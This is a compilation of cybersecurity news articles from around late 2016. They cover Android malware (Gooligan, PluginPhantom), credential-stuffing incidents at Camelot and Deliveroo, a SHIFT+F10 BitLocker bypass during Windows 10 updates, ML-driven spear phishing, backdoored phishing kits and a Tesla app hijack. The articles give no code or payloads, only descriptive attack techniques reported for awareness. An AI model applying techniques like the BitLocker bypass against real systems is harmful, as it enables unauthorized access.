"Gooligan" Android Malware Steals Authentication Tokens to Hack User Accounts

"Gooligan" Android Malware Steals Authentication Tokens to Compromise More Than 1 Million Google User Accounts

Researchers from Check Point Software Technologies shared details on Wednesday of new Android malware that has compromised more than a million Google Accounts.

Dubbed Gooligan by the security firm, the malware targets devices running Android 4 and 5, which represent nearly 74 percent of Android devices currently in use.

According to Check Point, the mobile malware can steal authentication tokens stored on devices which can be used to access sensitive data from Gmail, Google Photos, Google Docs and other services, including G Suite.

Check Point’s research team originally discovered Gooligan's code in a malicious app called SnapPea last year. They discovered a new variant in August 2016 which they say is infecting 13,000 Android devices per day, with approximately 57 percent of infected devices located in Asia and about nine percent in Europe.

"The infection begins when a user downloads and installs a Gooligan-infected app on a vulnerable Android device, or by clicking on malicious links in phishing attack messages," Check Point explained in a blog post.

After gaining control over the Android device, the cybercriminals behind Gooligan make money by fraudulently installing apps from Google Play and rating them on behalf of the victim, Check Point said. Gooligan installs at least 30,000 apps daily on compromised devices, totaling more than 2 million apps since the campaign first kicked off.

“If your account has been breached, a clean installation of an operating system on your mobile device is required. This complex process is called flashing, and we recommend powering off your device, and approaching a certified technician or your mobile service provider, to re-flash your device,” said Michael Shaulov, Check Point's head of mobile products.

Check Point has made available a free online tool that allows users to check if their account has been breached by Gooligan. 

In related Android security news, Palo Alto Networks shared details on a recently discovered Android Trojan dubbed “PluginPhantom” that abuses a legitimate plugin framework to update itself and evade static detection. According to to the network security firm, PluginPhantom focuses on data theft and is capable of stealing files, contacts, location data and Wi-Fi information, while also being able to take photos, capture screenshots, intercept and send SMS messages, record audio and log keystrokes.

"PluginPhantom" Android Trojan Uses Plugins to Evade Detection

A recently discovered Android Trojan dubbed “PluginPhantom” abuses a legitimate plugin framework to update itself and evade static detection, Palo Alto Networks reported on Wednesday.

PluginPhantom focuses on data theft and it’s capable of stealing files, contacts, location data and Wi-Fi information. The threat can also take photos, capture screenshots, intercept and send SMS messages, record audio and log keystrokes.

PluginPhantom is believed to be a successor of Android.Trojan.Ihide, a piece of malware analyzed by TrustLock in July. However, unlike other Android Trojans and its predecessor, PluginPhantom is based on a type of design architecture where the malicious application is divided into a main host app and multiple plugins.

To achieve this, it uses DroidPlugin, a plugin framework developed by Chinese security firm Qihoo 360. DroidPlugin enables a host application to run multiple plugins without the need to install them. This has allowed PluginPhantom developers to implement various malicious functions in different plugins, which can be loaded and launched by the host app.

PluginPhantom has nine plugins embedded in the host app as asset files. These include three core plugins, designed for command and control (C&C) server communications and updates, and six plugins focusing on data theft.

In addition to the functionality provided by the plugins, the main app includes keylogging capabilities obtained by abusing Accessibility features.

Palo Alto Networks researchers told SecurityWeek that they have no reason to believe the malware has made it onto Google Play, but they don’t have any information on how the threat has been distributed.

There is also no information on who might be targeted, but the security firm pointed out that the location data collected by the malware is translated to coordinate systems used by Baidu Maps and Amap Maps, navigation apps that are highly popular in China.

By hiding the malicious functionality in plugins, the Android Trojan increases its chances of evading static detection mechanisms. PluginPhantom appears to be the first Android Trojan to leverage this method, but experts believe other malware developers may start using it and it’s possible that it will end up replacing the widely used repackaging techniques.

“Since the plugin development pattern is generic and the plugin SDK can be easily embedded, the plugin architecture could be a trend among Android malware in the future,” Palo Alto Networks researchers said.

In related news, researchers from Check Point Software Technologies shared details on Wednesday of new Android malware that has compromised more than a million Google Accounts. Dubbed Gooligan by the security firm, the malware targets devices running Android 4 and 5 and can steal authentication tokens stored on devices which can be used to access sensitive data from Gmail, Google Photos, Google Docs and other services, including G Suite.

Thousands of UK National Lottery Accounts Breached

Camelot, the company that runs the UK National Lottery, announced today that approximately 26,500 customer accounts had been fraudulently accessed. The activity was discovered on Monday.

Camelot claims that "there has been no unauthorized access to core National Lottery systems or any of our databases;" that is, it has not been hacked. Instead it suggests that the attackers used emails and passwords stolen from another online service.

Camelot is also confident that the affected customers cannot directly lose financially from the activity, although some personal information will have been accessed. It adds, "We have taken the measure of suspending the accounts of these players and are in the process of contacting them to help them re-activate their accounts securely." This will undoubtedly lead to increased phishing activity as criminals pretend to be Camelot offering help while actually soliciting further personal information.

The incident demonstrates the need for a responsible partnership between online organization and users. Both have their part to play. Organizations should require two factor authentication (and there are now several frictionless biometric options available), while customers should never reuse passwords for any account that holds personal or financial details.

While Camelot is forcing affected customers to change their password, several security experts are suggesting that all Camelot users should do so. While this is good advice, it is not enough. There are certain parallels between this incident and an earlier incident at Tesco Bank less than one month ago.

In both cases it seems as if the attackers timed their activity over a weekend. A similar number of accounts were affected, and in both cases credentials stolen elsewhere were used. The possibility that attackers are automating the extraction of customer details from large stolen databases should not be ignored. If this is the case, then it is not just affected Camelot customers that should change their passwords, but anyone who has reused passwords for more than one account. Needless to say, if a two-factor authentication option is available, it should be adopted.

"There's no doubt that when one database is breached, it's common for the credentials stolen to be tried elsewhere," comments ESET senior research fellow David Harley. "If you were a bad guy, why wouldn’t you try them elsewhere? It can be done manually, of course, but it doesn’t require a lot of effort to automate, either. Which is why I (and many other security commentators) routinely recommend that people don't re-use credentials, at any rate for sites that use and may retain significant data."

The danger, however, is whether these bad guys are able to find common third-party services among the millions of email addresses and passwords at their disposal; that is, if they can find a way of locating Tesco Bank customers, or Camelot customers within the databases. This would not be impossible. Among the stolen credentials there will be many that provide access to the users' actual email accounts.

On Monday of this week, the New York Times published, "How Google Knows When Your Bills Are Due." The answer is simple. "What is probably happening here is that Google is automatically scanning your Gmail messages for notices about package deliveries, flight times, restaurant invitations, and yes — bill reminders — and using the information in smartphone alerts for its Google Now/Google Assistant software."

But anyone with access to an email account can scan the content, looking for whatever they want. "Perhaps the connection between Tesco Bank and Camelot are shared email addresses?" asks F-Secure's Sean Sullivan. "It was thought that credentials 

(emails/passwords) were brute forced at Tesco. But perhaps some hackers have access to email accounts and know what services are used because of the content in the Inboxes. I would guess that there is crossover between Tesco customers and lottery players."

Given the increasing use of automation by cyber criminals, and the potential for future use of machine learning in their endeavors, we should not dismiss the possibility of further weekend attacks against thousands of customers at individual pre-selected organizations.

SHIFT+F10 During Windows 10 Updates Can Bypass BitLocker

Windows has long had a troubleshooting feature that can be used during installs: SHIFT+F10 brings up a command prompt. While this has many advantages, it can be abused. For example, during the more frequent feature updates in Windows 10 (as opposed to the old practice of providing a distinct new OS version), pressing SHIFT+F10 gives the user admin privileges while BitLocker is disabled.

Windows expert Sami Laiho blogged about the issue yesterday. "There is a small but CRAZY bug in the way the 'Feature Update' (previously known as "Upgrade") is installed," he wrote. This includes the troubleshooting feature that allows you to press SHIFT+F10 to get a Command Prompt. "This sadly," he says, "allows for access to the hard disk as during the upgrade Microsoft disables BitLocker."

It is the ability to bypass BitLocker that makes this a serious if not a major issue. The attacker almost certainly needs physical access to the target machine during a relatively short time frame. Nevertheless, "The real issue here is the Elevation of Privilege that takes a non-admin to SYSTEM (the root of Windows) even on a BitLocker (Microsoft's hard disk encryption) protected machine," adds Laiho. "And of course that this doesn't require any external hardware or additional software."

Andy Patel, a security expert with F-Secure, has been considering how this could be used in a live attack. He considered whether a laptop could be stolen, and the system 'tricked' into assuming a feature update. While technically possible, if the attacker has ownership of the laptop, he would probably have easier methods of defeating BitLocker.

Nevertheless, Patel told SecurityWeek, "Microsoft does tend to telegraph the timing of its feature updates." This would give a disgruntled but tech-savvy employee a window in which to obtain elevated access to the system, and do whatever he wishes. "The risk exists," he said, "albeit a difficult one to exploit."

Laiho adds that there is also the risk of an external threat with access to a computer that just "waits for it to start an upgrade to get into the system." He is sufficiently concerned to have advised his customers to use Microsoft's Long Time Servicing Branch (LTSB) for the time being. This (the Current Branch) forces Microsoft's earlier update process rather than the newer, and vulnerable, feature update process. He also advises that companies should not allow unattended updates, and should "Keep very tight watch on the Insiders."

While the SHIFT+F10 feature has existed with earlier versions of Windows, and could also be used to bypass BitLocker on Windows 7 & 8, it is only with the advent of Windows 10's inplace upgrades that it has become a real vulnerability. Laiho himself notes that he used it as long ago as NT when he pressed SHIFT+F10 so that he could play solitaire while doing a new NT install.

His solution of staying on LTSB, however, has caused some disagreement among admins and others (in the blog comment stream). One suggested, "The LTSB isn't designed for use as a daily driver. Full stop. Users will encounter significant usability issues." He added, "The impact of this issue to any organization must be examined in the context of their threat model. Again: if bad actors have the freedom of access to wait for updates, then your organization has much bigger issues."

Laiho countered that in his travels he had "seen hundreds of computers doing upgrades at airports so I agree there is a bigger problem but I don't see how having a bigger problem would have prevented me from using this to access the machine rather than anything that is harder."

There is a risk here. That cannot be denied. How individual companies respond to that risk will depend on their own risk appetite -- but they should at least be aware of it. Laiho waited until Microsoft Product Groups confirmed to him that they "not only know about this but that they have begun working on a fix." Any company confident that a fix is genuinely coming could use LTSB in the interim, switching back to the Current Branch of updates once the fix is in place.

'Dronejacking' May be the Next Big Cyber Threat

A big rise in drone use is likely to lead to a new wave of "dronejackings" by cybercriminals, security experts warned Tuesday.

A report by Intel's McAfee Labs said hackers are expected to start targeting drones used for deliveries, law enforcement or camera crews, in addition to hobbyists.

"Drones are well on the way to becoming a major tool for shippers, law enforcement agencies, photographers, farmers, the news media, and more," said Intel Security's Bruce Snell, in the company's annual threat report.

Snell said the concept of dronejacking was demonstrated at a security conference last year, where researchers showed how someone could easily take control of a toy drone.

"Although taking over a kid's drone may seem amusing and not that big of an issue, once we look at the increase in drone usage potential problems starts to arise," he said.

The report noted that many consumer drones lack adequate security, which makes it easy for an outside hacker to take control.

Companies like Amazon and UPS are expected to use drones for package deliveries -- becoming potential targets for criminals, the report said.

"Someone looking to 'dronejack' deliveries could find a location with regular drone traffic and wait for the targets to appear," the report said.

"Once a package delivery drone is overhead, the drone could be sent to the ground, allowing the criminal to steal the package."

The researchers said criminals may also look to steal expensive photographic equipment carried by drones, to knock out surveillance cameras used by law enforcement.

Intel said it expects to see dronejacking "toolkits" traded on "dark web" marketplaces in 2017.

"Once these toolkits start making the rounds, it is just a matter of time before we see stories of hijacked drones showing up in the evening news," the report said.

Other predictions in the report included a decrease in so-called "ransomware" attacks as defenses improve, but a rise in mobile attacks that enable cyber thieves to steal bank account or credit card information.

The report also noted that cybercriminals will begin using more sophisticated artificial intelligence or "machine learning" techniques and employ fake online ads.

How Machine Learning Will Help Attackers

Machine Learning Will Improve The Probability of a Successful Attack

Inside McAfee Labs' predictions (PDF) for 2017 is this: criminals will use machine learning to analyze massive quantities of stolen records to identify potential victims and build contextually detailed emails that very effectively target these individuals. In short, just as defenders use machine learning to detect attacks, attackers will use machine learning to automate attacks and evade detection.

SecurityWeek spoke to Intel Security's CTO, Steve Grobman, to learn more. He sees two separate areas in which adversaries will use machine learning (ML). The first "is to use ML techniques to develop strategies to disrupt ML defenses." The second is ML "as a tool to make their attacks more effective -- a good example that we're starting to see already is using ML for the automation of advanced spear phishing."

In the first approach, said Grobman, "Machine learning can be used to analyze defense methods and develop new evasion techniques." For example, "by poisoning the model -- introducing false data so that the good guys' ML defenses will start to classify things incorrectly." 

Another good example, he added, "is a technique called 'raising the noise floor'." In this approach, an adversary will bombard an environment with information that is really false positives, but that look like things that would be detected by various ML detection models.

"If he starts to get a lot of false positives, the defender will need to recalibrate his model to make it less sensitive," Grobman explained. But the false positives fed into the defense can be crafted to be similar to a planned future attack. "Essentially the attacker causes the defender to recalibrate his model so that he doesn't pick up all these falses, and this opens the door to allow the attacker to sneak in," he said.

This type of ML versus ML is already used by Endgame in its red team versus blue teamwargames environment. Red teams are attackers; blue teams are defenders. Endgame uses machine learning to simulate both, each learning from the other -- but Grobman sees this spilling out from simulations into real life red team attackers.

His second area of concern involves the use of machine learning to refine social engineering attacks; and the danger is that such automation will allow targeted spear phishing at scale -- bulk phishing campaigns with the success rate of targeted attacks.

"In the past," he explained, "you could either do an automated bulk phish with little personalization, or you could do highly targeted spear phish campaigns. In the latter, a human does the analysis from social media, news stories and so on in order to determine the social engineering content for the spear phishing. Machine learning can give you the effectiveness of spear phishing within bulk phishing campaigns; for example, by using ML to scan twitter feeds or other content associated with the user in order to craft a targeted message."

Just as Endgame provides a basic model for ML versus ML, so too there is a model for ML-based social engineering already in the public domain. At Black Hat USA 2016, John Seymour and Philip Tully presented a paper titled "Weaponizing data science for social engineering: Automated E2E spear phishing on Twitter" (PDF).

This paper describes and presents "SNAP_R, a recurrent neural network that learns to tweet phishing posts targeting specific users. The model is trained using spear phishing pentesting data, and in order to make a click-through more likely, it is dynamically seeded with topics extracted from timeline posts of both the target and the users they retweet or follow."

The scary part of SNAP_R is that tests prove it remarkably effective. In tests involving 90 users, the automated spear phishing framework had between a 30% and 60% success rate. Large scale manual spear phishing traditionally has a 45% success rate. Bulk phishing has just a 5% to 14%. But these are early days in the evolution of ML models for social engineering and we can expect rapid improvements over the next couple of years. Machine learning is likely to make targeted spear-phishing more accurate and available in bulk to the adversaries.

Grobman's concern is that criminals will always adopt whatever technologies improve their chance of success. The problem for business, he told SecurityWeek, is that everything is already available: machine learning algorithms and data science tutorials are in the public domain. And the public cloud offers low cost on-demand undetectable compute power to do the number crunching. Machine learning by adversaries is likely to become almost as prolific as machine learning by defenders.

Microsoft's EMET Protects Apps Better Than Windows 10, Researcher Says

While packed with a load of new security features, Window 10 doesn’t offer some of the additional protections that Microsoft’s Enhanced Mitigation Experience Toolkit (EMET) brings, CERT vulnerability analyst Will Dormann warns.

Released in 2009, EMET was meant to provide mitigation against certain zero-day software vulnerabilities, filling a gap created by the release of major Windows versions 3-4 years after one another.

Although the tool helped interrupt and disrupt many common exploit kits before patches were released, Microsoft now feels that EMET can no longer do its job properly, and says that its lack of integration with the operating system is its main limitation. What’s more, the tech company says that the utility wasn’t created to offer real durable protection over time and that Windows 10 packs all of the necessary protections to render the tool useless.

With that mindset, Microsoft recently announced that EMET will be retired on July 31, 2018, after it pushed back the date following customer feedback. Previously, the company was planning EMET’s retirement for Jan. 27, 2017.

CERT’s Will Dormann, however, claims that Microsoft should keep EMET alive, as this is “still an important tool to help prevent exploitation of vulnerabilities.” According to him, version 5.51 of the tool provides both system-wide protection and application-specific mitigations that continue to make it relevant even on Windows 10 systems.

The application-specific protection offered by EMET makes all the difference, he explains. While both a stock Windows installation and one with EMET properly configured offer about the same level of system-wide mitigations, a Windows installation without EMET is virtually unprotected when application-specific mitigations are considered, as the table to the right shows.

“It is pretty clear that an application running on a stock Windows 10 system does not have the same protections as one running on a Windows 10 system with EMET properly configured. Even a Windows 7 system with EMET configured protects your application more than a stock Windows 10 system,” Dormann says.

According to him, Microsoft’s claim that Windows 10 makes EMET irrelevant is fiction, mainly because it overlooks the primary reason for someone to run the tool: because it can apply all of the available exploit mitigations to all applications. This doesn’t happen through the underlying Windows platform even if the operating system offers support for the mitigation, the researcher explains.

Because developers adopt exploit mitigations at a slow rate, EMET with application-specific mitigations enabled is the only protection available. Even Microsoft doesn’t “compile all of Office 2010 with the /DYNAMICBASE flag to indicate compatibility with ASLR,” meaning that an attacker could work around ASLR to load a non-DYNAMICBASE library into the process space of the vulnerable application and could exploit a memory corruption vulnerability, the researcher explains.

“Microsoft strongly implies that if you are running Windows 10, there is no need for EMET anymore. This implication is not true. The reason it's not true is that Windows 10 does not provide the application-specific mitigations that EMET does,” Dormann notes.

While Windows 10 does provide some exploit mitigations, Dormann explains, the applications have been be specifically compiled to take advantage of them. Thus, if an application isn’t built to take advantage of the mitigation, it doesn’t matter if the underlying operating system supports that mitigation or not.

The researcher also notes that, while EMET will reach its end-of-life (EOL) on July 31, 2018, the application will likely continue to work as before, only without assistance from Microsoft. Software currently outside of the support window should be tested so that EMET could provide protection against zero-days. Vulnerabilities in products outside of their support cycle become “forever-days,” because they will never be fixed, the researcher also says.

In Dormann’s opinion, both an upgrade to Windows 10 for exploit mitigation and installing EMET with application-specific mitigations configured are recommended actions. Without the utility, system-wide mitigations of DEP and ASLR can be applied, but Windows 10 can’t cover all of the mitigations admins using EMET have come to rely on. The tool, he says, can provide protection against both zero-days in supported software and forever-days in unsupported software.

Google Warns Users of Recent State-sponsored Attacks

Google Warns Journalists and Activists About Recent State-Sponsored Attacks

Over the last few days, Google has delivered a batch of warnings about potential government-backed attacks against numerous journalists, academics and activists. Many of the recipients have announced their personal warnings on Twitter. There are some differences in the wording of some of the warnings, but Google has confirmed that the Twitter postings appear to be authentic.

Google has been issuing such warnings since 2012. At first they were simple text alerts across the top of the recipients' Gmail page. In March of this year it started to use the larger more noticeable banners that are now appearing. The warnings do not indicate that an account has actually been compromised; only that Google researchers have seen indications of an attempt against the account.

The warnings are also not timely. The attack indicators were likely noticed up to a month earlier. Google does not issue immediate warnings for fear that this will allow attackers to determine the method of discovery. This time lapse has led to certain assumptions that the attackers are likely to be the Russian actors, possibly APT28 or APT29, that were linked to attacks against the Democrats, supposedly to influence the election. (Last month, Russian hackers were also linked with targeting journalists investigating the MH17 crash.)

This, however, has to be conjecture. Google does not publicly provide any evidence on the identity of the attackers -- and at least one target is a Hong-Kong-based Chinese activist (Joshua Wong Chi-fung).

"Google has been secretive about the algorithms and criteria it uses to determine that a potential attack is state-sponsored," explains ESET senior research fellow David Harley; adding that such secrecy about proprietary algorithms is not unusual in the security industry. "The relationship with the APT29 targeted malware is speculative, but I can't say there isn't a connection. If an attack is based on code that is associated with known state-sponsored attacks, that could be another indicator, if you have that sort of information. Google isn't exactly known for a spirit of friendly cooperation with the security industry at large, but it certainly has security resources."

There is, however, an element of hysteria about this current batch of warnings; as if users need to take different precautions against nation attacks than they do against everyday criminal attacks. Activists are more likely to be attacked for political reasons, and in some cases the consequences could be more dire -- but the defenses remain the same as those everybody should be using as a matter of course.

"Journalists and professors already know what they should do - and if they don't, they can easily look it up. If they don't already follow best practices it's because they suffer from the fallacy that they aren't important enough to target," comments F-Secure's Sean Sullivan. It is certainly true that users receiving Google warnings should take immediate steps to confirm the integrity of their account: Google doesn't say the attack was successful, but nor does it say it failed.

Caleb Chen, who works with Private Internet Access, points out that state-sponsored attacks may be more prevalent than is commonly thought. Google says only that it is likely to happen to less than 0.1% of its users. If there are a billion Gmail users, he suggests, those figures mean that up to a million may have seen state-sponsored probing. "As cyber-attacks continue to proliferate, often times across borders, expect reports of this type of probing to rise in the future." 

There is also an irony about warnings being attributed to foreign governments coming at the same time as the US and particularly the UK governments are increasing their own surveillance capabilities. Luis Corrons, technical director at PandaLabs insists there is a difference. "One thing is knowing that governments are harvesting loads of information from everyone, and another thing is an attack targeted at you, so they can compromise your computer and access (steal) all your information, sources, etc."

Nevertheless, Chen reports a 30% spike in VPN sales from the UK in the week in which the IP Bill completed its course through parliament. While standard computer defenses are required to protect accounts, VPNs are now also required to protect communications -- especially those of activists of any persuasion.

Account defenses obviously include strong passwords, 2FA where possible, reputable anti-virus, and an awareness of spear-phishing techniques; but Corrons offers one other piece of advice for journalists and activists: "Ideally have all your sensitive information in a different computer to the one you use for your emails, Internet, etc. Even better if this one is not connected to the Internet."

Backdoored Phishing Templates Advertised on YouTube

Scammers are abusing YouTube as a new way to promote backdoored phishing templates and provide potential buyers with information on how to use the nefarious software, Proofpoint researchers warn.

Because cybercrime is a business, crooks are constantly searching for new means to advertise their products to increase gains. For some, YouTube seemed like a good selling venue, and they decided to promote their kits on this legitimate website.

A search for “paypal scama” returns over 114,000 results, but buyers are in for a surprise, Proofpoint reveals. To be more precise, while the kits work as advertised, they also include a backdoor that automatically sends the phished information back to the author.

Proofpoint security researchers stumbled upon several YouTube videos that linked to phishing kits, templates, or to pages offering more information on these. The videos were created to show what the templates looked like and to instruct potential buyers on how to collect the phished information.

One of these videos, for example, showed an Amazon phishing template meant to replicate the legitimate login page on the web portal. The video’s authors instructed interested parties to contact them via a Facebook page.

When analyzing the code taken from another example of a phishing template that has been downloaded from a link on a similar video, the security researchers found the author’s Gmail address hardcoded in it. Thus, the author would receive the results of the phish each time the kit was used.

The same kit included a secondary email address that was also receiving the stolen information. What the security researchers didn’t manage to figure out was whether the same author included both addresses in the code or someone else added the second one and decided to redistribute the kit.

A PayPal scam analyzed by the researchers revealed that the cybercriminals attempted to avoid suspicion by adding a PHP include for a file called style.js just before the PHP “mail” command is used to send the stolen credentials. The style.js file, however, was found to include more encoded PHP code. The hidden command in the code was also meant to send the phished information to the author.

“Many of the video samples we found on YouTube have been posted for months, suggesting that YouTube does not have an automated mechanism for detection and removal of these types of videos and links. They remain a free, easy-to-use method for the authors of phishing kits and templates to advertise, demonstrate, and distribute their software,” Proofpoint says.

The security researchers say that they found multiple samples where the authors included backdoors that allow them to harvest the phished credentials even after other actors purchased the templates to use them in their own campaigns. The victims of phishing attacks suffer the most, because they have their credentials stolen by multiple actors each time the backdoored kits are used.

Researchers Hijack Tesla Car by Hacking Mobile App

Researchers at Norway-based security firm Promon have demonstrated how thieves with the necessary hacking skills can track and steal Tesla vehicles through the carmaker’s Android application.

In a video released this week, experts showed how they could obtain the targeted user’s credentials and leverage the information to track the vehicle and drive it away. There are several conditions that need to be met for this attack and the victim must be tricked into installing a malicious app on their mobile phone, but the researchers believe their scenario is plausible.

According to Promon, the Tesla mobile app uses HTTP requests and an OAuth token to communicate with the Tesla server. The token is valid for 90 days and it allows users to authenticate without having to enter their username and password every time they launch the app.

The problem is that this token is stored in cleartext in the app’s sandbox folder, allowing a remote attacker with access to the device to steal the data and use it to send specially crafted requests to the server. Once they obtain this token, criminals can use it to locate the car and open its doors. In order to enable the keyless driving feature and actually steal the vehicle, they need to obtain the victim’s username and password as well.

Experts believe this can be achieved by tricking the user into installing a piece of malware that modifies the Tesla app and steals the username and password when the victim enters them in the app. According to researchers, the legitimate Tesla app can be modified using one of the many vulnerabilities affecting Android, such as the issue known as TowelRoot. The TowelRoot exploit, which allows attackers to elevate privileges to root, has been used by an Android malware dubbed Godless.

In order to get the victim to install the malicious app, the attacker can use various methods, including free Wi-Fi hotspots.

“When the Tesla owner connects to the Wi-Fi hotspot and visits a web page, he is redirected to a captive portal that displays an advertisement targeting Tesla owners. In [our] example, an app was advertised that offers the Tesla owner a free meal at the nearby restaurant. When the Tesla owner then clicks on the advertisement, he is redirected to the Google Play store where the malicious app is displayed,” experts said.

While there are multiple conditions that need to be met for the attack to work, researchers pointed out that many devices run vulnerable versions of Android and users are often tricked into installing malware onto their devices.

Promon has not disclosed any technical details about the attack method. The company says it has been working with Tesla on addressing the issues. It’s worth noting that Tesla has a bug bounty program with a maximum payout of $10,000 for each flaw found in its websites, mobile apps and vehicle hardware.

This is not the first time researchers have demonstrated that Tesla cars can be hacked remotely. A few weeks ago, experts at China-based tech company Tencent showed that they could remotely control an unmodified Tesla Model S while it was parked or on the move. Tesla quickly patched the vulnerabilities found by Tencent, but downplayed their severity, claiming that the attack was not fully remote, as suggested in a video released by experts.

SecurityWeek has reached out to Tesla for comment and will update this article if the company responds.

UPDATE. Tesla told SecurityWeek that none of the vulnerabilities used in this attack are specific to the company's products

"The report and video do not demonstrate any Tesla-specific vulnerabilities," said a Tesla spokesperson. "This demonstration shows what most people intuitively know – if a phone is hacked, the applications on that phone may no longer be secure. The researchers showed that known social engineering techniques could be employed to trick people into installing malware on their Android devices, compromising their entire phone and all apps, which also includes their Tesla app. Tesla recommends users run the latest version of their mobile operating system."

Wave of "Food Fraud" Reported at UK's Deliveroo Service

BBC Watchdog (a consumer protection television program) is today airing a report on 'food fraud' against the UK-based Deliveroo service. Food is ordered via the Deliveroo iOS or Android apps, and delivered to the customer. It appears, however, that scores of customers have recently been charged for food they didn't order; food that was actually delivered to complete strangers.

Deliveroo is adamant that it has not suffered a breach, and that no card details or other personal information has been stolen. "We are aware of these cases raised by Watchdog - they involve stolen food, not credit card numbers," it said in a statement. "These issues occur when criminals use a password stolen from another service unrelated to our company in a major data breach." Deliveroo is reimbursing the customers.

If Deliveroo is correct in this statement, it raises several other issues. Firstly, yes and obviously, users need to start practicing better password hygiene. Secondly, Deliveroo needs to improve its security in terms of fraud detection and customer authentication. Thirdly, it is not immediately apparent how the fraudster benefits from this fraud.

The reaction from most security vendors is simple. Single factor password authentication is no longer adequate. Users should have unique strong passwords for every service they use, while vendors should implement and insist on multi-factor authentication. It seems clear that multi-factor authentication (MFA) hasn't been implemented because Deliveroo has sought a frictionless experience for its users. Furthering this frictionless approach, Deliveroo maintains the customers' card details to allow easily repeatable orders -- but does not require the 3-digit security number when taking new orders.

This fits in with the idea that the fraudster/s used credentials obtained from other hacks and released on the internet -- that is all they would need. Kaspersky Lab's David Emm comments, "Businesses must ensure they implement two-factor authentication, so that credentials stolen from another site would not be sufficient for an attacker to get access to their customers' accounts." 

F-Secure's Sean Sullivan agrees. "An app such as this probably really requires that the app vendor requests the account holder's phone number -- and then sends an SMS with a code in order to activate the app. If all it relies on is a password… then any old fraudster will be able to exploit the system for free food. If a second factor of some sort is used during setup, it limits the risk. But that's the thing… start-ups want to be 'frictionless' to setup. So, Deliveroo will just have to eat the costs, if it can."

But you can have frictionless MFA with modern smartphones using, for example, facial recognition.

It is difficult at this point to know whether Deliveroo has adequate fraud prevention systems simply because there is insufficient information yet. But it seems unlikely.

The BBC reports, "User Judith MacFadyen, from Reading, told Watchdog: 'I noticed that I had a 'thank you' email from Deliveroo for a burger joint in Chiswick. I thought that was really odd so I went on to my account and had a look and there had been four orders that afternoon to a couple of addresses in London.'" Four separate orders on one account to two addresses in one afternoon should really trip warning flags.

The third puzzle is how does the fraudster benefit from food delivered to different parts of the country? Three locations are mentioned by the BBC; London, Reading and Manchester. Manchester and London are 200 miles apart. It could still be simple food fraud. Sullivan explains, "All the fraudster needs to do is to have the food delivered to a public address such as a coworking space. Or even just the front of some building -- the app lets you track the delivery -- so the fraudster would know when to step forward to claim the order. The delivery person isn't going to be able to vet the person picking up the food is actually the legitimate account holder. They'll just hand over the food to the person who knows the order ID."

But multiple orders in one afternoon and such diverse delivery locations suggest it could equally be something different. ESET Senior Research Fellow David Harley commented, "I wouldn’t be surprised if it did turn out to be due to the action of a person or persons targeting the company by getting food delivered to what may be randomly-selected addresses. A disgruntled employee? A competitor using information provided by a mole? A hacker for hire, or just doing it because it amuses them and they can? I don’t know, but I'll be watching future developments with interest."